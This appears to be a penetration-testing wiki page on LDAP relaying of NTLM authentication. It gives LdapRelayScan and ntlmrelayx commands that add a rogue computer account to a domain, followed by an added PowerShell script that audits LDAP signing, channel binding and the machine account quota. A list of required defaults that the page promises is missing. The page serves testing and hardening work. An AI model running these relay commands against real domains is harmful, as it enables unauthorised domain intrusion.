LDAP Relaying

LDAP relaying abuses NTLM authentication. As with SMB relaying, an attacker who intercepts an NTLM authentication via mitm6 or Responder can relay it to a domain controller, targeting its LDAP service.

Note that the following two defaults must be in place for this to be exploitable:

Enumeration

LDAPRelayScan

LDAPRelayScan can be utilized to identify whether LDAP Signing and/or LDAP Channel Binding are enabled or not.

# Generic usage of LdapRelayScan.py
LdapRelayScan.py -u $user -p $password -dc-ip $dcipaddress -method BOTH

Exploitation

Create a new domain computer by abusing the default attribute ms-DS-MachineAccountQuota, which is set to 10 by default, allowing every authenticated user to add up to 10 computers to the domain.

This account can then be utilized to perform authenticated attacks against the domain such as Kerberoasting.

# Relay to LDAP (possible when LDAP signing is not required)
ntlmrelayx.py -t ldap://$dcip --add-computer $computername

# Relay to LDAPS (possible when LDAP channel binding is not enforced)
ntlmrelayx.py -t ldaps://$dcip --add-computer $computername
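From the defender's side, the same three settings the page relies on (LDAP signing, LDAP channel binding, ms-DS-MachineAccountQuota) can be audited directly on a domain controller. This is an added example, not part of the original page; it assumes an elevated PowerShell session on a domain controller with the ActiveDirectory module, and uses the documented NTDS registry value names.

```powershell
# Added example (not from the original page): report which LDAP relay-enabling
# defaults are still in place on this domain controller.
Import-Module ActiveDirectory

$ntdsPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
$ntds = Get-ItemProperty -Path $ntdsPath

# LDAPServerIntegrity: 1 or absent = Negotiate signing (relay possible), 2 = Require signing
$signing = $ntds.LDAPServerIntegrity
# LdapEnforceChannelBinding: 0 = never, 1 = when supported, 2 = always (only 2 stops relay to LDAPS)
$cbt = $ntds.LdapEnforceChannelBinding

# ms-DS-MachineAccountQuota is stored on the domain naming context object
$domain = Get-ADDomain
$maq = (Get-ADObject -Identity $domain.DistinguishedName `
        -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'

function Format-Value($v) { if ($null -eq $v) { 'not set' } else { $v } }

$findings = @()
if ($signing -ne 2) {
    $findings += "LDAP signing is not required (LDAPServerIntegrity = $(Format-Value $signing)); " +
                 "relayed NTLM binds over LDAP are accepted. Set it to 2."
}
if ($cbt -ne 2) {
    $findings += "Channel binding is not enforced (LdapEnforceChannelBinding = $(Format-Value $cbt)); " +
                 "relayed NTLM binds over LDAPS are accepted. Set it to 2."
}
if ($maq -gt 0) {
    $findings += "ms-DS-MachineAccountQuota = $maq; any authenticated user can add computer accounts. Set it to 0."
}

if ($findings.Count -eq 0) {
    "No LDAP relay-enabling defaults found on $($domain.DNSRoot)."
} else {
    $findings | ForEach-Object { "[!] $_" }
}
```

Before raising LDAPServerIntegrity or LdapEnforceChannelBinding to 2, check the Directory Service event log for clients that still bind without signing or channel binding, since they will be rejected once the settings are enforced.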
